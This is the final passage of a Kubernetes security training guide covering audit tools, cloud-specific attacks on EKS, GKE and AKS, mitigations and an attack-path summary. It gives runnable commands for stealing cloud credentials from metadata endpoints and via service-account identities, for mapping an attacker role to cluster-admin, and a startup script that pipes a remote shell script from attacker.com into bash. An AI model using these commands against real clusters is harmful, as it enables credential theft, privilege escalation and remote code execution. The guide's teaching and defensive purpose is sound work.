| Tetragon | eBPF observability | DaemonSet |
| OPA/Gatekeeper | Policy admission | Admission webhook |
| Kyverno | Policy engine | Admission webhook |
| Polaris | Best practice audit | Dashboard, webhook, CLI |
| Popeye | Cluster sanitizer | CLI |
| kubesec | Manifest risk scoring | CLI, webhook |
| Trivy | Vulnerability scanning | CLI, operator |
# kube-bench
kube-bench run --targets master
kube-bench run --targets node
kube-bench run --targets etcd
kube-bench run --benchmark eks-1.2.0

# Kubescape
kubescape scan framework nsa
kubescape scan framework mitre
kubescape scan framework cis-v1.23-t1.0.1
kubescape scan --format json --output results.json

# Trivy (image + K8s scanning)
trivy image nginx:latest
trivy k8s --report summary cluster
trivy k8s --report all --severity HIGH,CRITICAL

# Polaris
polaris audit --audit-path deployment.yaml
polaris audit --format=json

# kubesec
kubesec scan pod.yaml
# Scores: -30 CAP_SYS_ADMIN, -7 AllowPrivilegeEscalation, +1 runAsNonRoot

13. Cloud-Specific Kubernetes Attacks

13.1 AWS EKS -- IRSA Abuse

ATT&CK: T1078 (Valid Accounts), T1528 (Steal Application Access Token)

# IRSA (IAM Roles for Service Accounts) attack flow:
# 1. Find SAs with IAM role annotations
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["eks.amazonaws.com/role-arn"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   role: .metadata.annotations["eks.amazonaws.com/role-arn"]}'

# 2. Create a pod using the target SA
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: irsa-steal
  namespace: [TARGET_NS]
spec:
  serviceAccountName: [TARGET_SA]
  containers:
  - name: aws
    image: amazonlinux:2
    command: ["sleep", "infinity"]
EOF

# 3. The pod automatically gets AWS credentials via IRSA
kubectl exec -it irsa-steal -n [TARGET_NS] -- bash
aws sts get-caller-identity
aws s3 ls
aws iam list-roles

# EKS node IAM role abuse (from any pod without IMDS blocking)
ROLE=$(curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

# EKS-specific: aws-auth ConfigMap manipulation
# Controls IAM-to-K8s identity mapping
kubectl get configmap aws-auth -n kube-system -o yaml
# If you can edit this ConfigMap, you can map ANY IAM role to cluster-admin:
kubectl edit configmap aws-auth -n kube-system
# Add:
# - rolearn: arn:aws:iam::ATTACKER_ACCOUNT:role/attacker-role
#   username: cluster-admin
#   groups:
#   - system:masters

# EKS Pod Identity (newer mechanism)
# Check for pod identity associations
aws eks list-pod-identity-associations --cluster-name [CLUSTER]

Mitigation: Block IMDS from pods via NetworkPolicy. Use IMDSv2 with hop limit 1. Scope IRSA roles minimally. Protect aws-auth ConfigMap with OPA/Kyverno.

13.2 GCP GKE -- Workload Identity Abuse

# GKE Workload Identity maps K8s SAs to GCP SAs

# Find annotated service accounts
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["iam.gke.io/gcp-service-account"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   gsa: .metadata.annotations["iam.gke.io/gcp-service-account"]}'

# Create a pod using the target SA
# (kubectl run's --serviceaccount flag was removed in v1.24; use --overrides)
kubectl run wi-steal --image=google/cloud-sdk -n [TARGET_NS] \
  --overrides='{"spec":{"serviceAccountName":"[TARGET_SA]"}}' -- sleep infinity

# Get GCP access token
kubectl exec -it wi-steal -n [TARGET_NS] -- bash
curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
gcloud auth list
gcloud projects list
gsutil ls

# GKE metadata concealment bypass
# Even with metadata concealment, Workload Identity tokens are available
# Attack: use the WI token against GCP APIs directly
# (activate-service-account expects a key file, not an access token;
#  hand the raw token to gcloud via CLOUDSDK_AUTH_ACCESS_TOKEN instead)
TOKEN=$(curl -s -H "Metadata-Flavor: Google" \
  http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token \
  | jq -r .access_token)
CLOUDSDK_AUTH_ACCESS_TOKEN=$TOKEN gcloud projects list

# GKE node default SA often has broad permissions
# project-editor is common, which grants access to:
# - GCS buckets, GCR images, Compute instances, Cloud SQL, etc.

# GKE-specific: manipulate node pool metadata
# If you compromise the GKE control plane or have sufficient IAM:
gcloud container node-pools update [POOL] --cluster=[CLUSTER] \
  --metadata=startup-script=$'#!/bin/bash\ncurl http://attacker.com/shell.sh | bash'

Mitigation: Enable Workload Identity on all node pools. Disable legacy metadata endpoint. Use iam.gke.io/gcp-service-account annotations only where needed. Block metadata IP via NetworkPolicy.

13.3 Azure AKS -- AAD Integration Attacks

# AKS with Azure AD integration

# Azure Managed Identity from pods
TOKEN=$(curl -s -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/" \
  | jq -r .access_token)

# List subscriptions with stolen token
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions?api-version=2020-01-01"

# List all resources
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://management.azure.com/subscriptions/[SUB_ID]/resources?api-version=2021-04-01"

# Access Key Vault secrets
curl -s -H "Authorization: Bearer $TOKEN" \
  "https://[VAULT_NAME].vault.azure.net/secrets?api-version=7.3"

# AKS AAD Pod Identity (legacy)
kubectl get azureidentities -A
kubectl get azureidentitybindings -A
# If you can create AzureIdentityBindings, you can assume any managed identity

# AKS Workload Identity (newer)
kubectl get sa -A -o json | jq '
  .items[] | select(.metadata.annotations["azure.workload.identity/client-id"] != null) |
  {ns: .metadata.namespace, sa: .metadata.name,
   clientId: .metadata.annotations["azure.workload.identity/client-id"]}'

# AKS-specific: cluster admin credential theft
# If you have Azure Contributor on the AKS resource:
az aks get-credentials --resource-group [RG] --name [CLUSTER] --admin
# This gives cluster-admin kubeconfig regardless of K8s RBAC

# AKS run command (execute on cluster from Azure portal/CLI)
az aks command invoke --resource-group [RG] --name [CLUSTER] \
  --command "kubectl get secrets -A"

Mitigation: Use AKS Workload Identity instead of AAD Pod Identity. Disable managed identity on node pools where not needed. Restrict Azure RBAC on the AKS resource. Disable local accounts (az aks update --disable-local-accounts).

13.4 Cloud-Agnostic Mitigations

# Block IMDS from all pods (apply to every namespace)
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: block-cloud-metadata
spec:
  podSelector: {}
  policyTypes:
  - Egress
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0
        except:
        - 169.254.169.254/32
        - 169.254.170.2/32   # EKS pod identity agent
# AWS: set IMDS hop limit to 1 (blocks access from pods in container network)
aws ec2 modify-instance-metadata-options \
  --instance-id [INSTANCE_ID] \
  --http-put-response-hop-limit 1 \
  --http-tokens required

# GCP: enable workload identity on node pool (disables metadata for pods)
gcloud container node-pools update [POOL] --cluster=[CLUSTER] \
  --workload-metadata=GKE_METADATA

# Azure: disable IMDS for pods
# Use AKS network policy to block 169.254.169.254

Quick Reference: Attack Path Summary

+-----------------------------------------------------------------+
|                    K8s ATTACK PATHS                              |
+-----------------------------------------------------------------+
|                                                                  |
|  Initial Access                                                  |
|  +-- Exposed API server (anon auth)                              |
|  +-- Exposed dashboard (skip login)                              |
|  +-- Stolen kubeconfig                                           |
|  +-- Compromised CI/CD pipeline                                  |
|  +-- Application RCE (SSRF, injection)                           |
|  +-- Compromised container image                                 |
|  +-- Cloud credential theft -> cluster access                    |
|                                                                  |
|  Container -> Node Escalation                                    |
|  +-- Privileged pod -> cgroup/device/nsenter escape              |
|  +-- hostPath -> filesystem access -> cred theft                 |
|  +-- Docker/containerd socket -> new privileged container        |
|  +-- CVE exploitation (runc, containerd, kernel cgroups)         |
|  +-- core_pattern / SysRq abuse                                  |
|                                                                  |
|  Privilege Escalation                                            |
|  +-- RBAC: create pods -> use privileged SA                      |
|  +-- RBAC: bind roles -> grant cluster-admin                     |
|  +-- RBAC: escalate verb -> create god-mode role                 |
|  +-- RBAC: impersonate -> act as any user                        |
|  +-- RBAC: CSR signing -> forge certificates                     |
|  +-- Node to cluster via CA key / admin kubeconfig               |
|                                                                  |
|  Lateral Movement                                                |
|  +-- Pod-to-pod (no network policies)                            |
|  +-- SA token theft -> cross-namespace access                    |
|  +-- etcd access -> all cluster secrets                          |
|  +-- kubelet API -> exec in other pods                           |
|  +-- Cloud metadata -> IAM escalation                            |
|  +-- CoreDNS poisoning -> traffic redirect                       |
|  +-- ARP spoofing from hostNetwork pod                           |
|                                                                  |
|  Persistence                                                     |
|  +-- Admission webhook backdoor (sidecar injection)              |
|  +-- CronJob recurring execution                                 |
|  +-- Static pod (bypasses all admission)                         |
|  +-- DaemonSet on all nodes                                      |
|  +-- Container image backdoor                                    |
|  +-- Shadow API server                                           |
|                                                                  |
|  Credential Access                                               |
|  +-- K8s secrets via API                                         |
|  +-- etcd direct dump                                            |
|  +-- Mounted secrets / env vars                                  |
|  +-- Cloud IMDS credential theft                                 |
|  +-- IRSA / Workload Identity abuse                              |
|  +-- Image layer secrets                                         |
|                                                                  |
|  Data Exfiltration                                               |
|  +-- Volume mount access                                         |
|  +-- Sidecar injection                                           |
|  +-- DNS exfiltration                                            |
|  +-- Container registry theft                                    |
|  +-- HTTP/S egress                                               |
|                                                                  |
+-----------------------------------------------------------------+

Training material compiled from Kubernetes Goat, BishopFox BadPods, CDK, Peirates, KubeHound, kube-bench, kube-hunter, kubesec, Popeye, Kubescape, Polaris, Falco, Tetragon, OPA/Gatekeeper, Kyverno, external-secrets-operator, Microsoft Kubernetes Threat Matrix, and MITRE ATT&CK Containers Matrix.
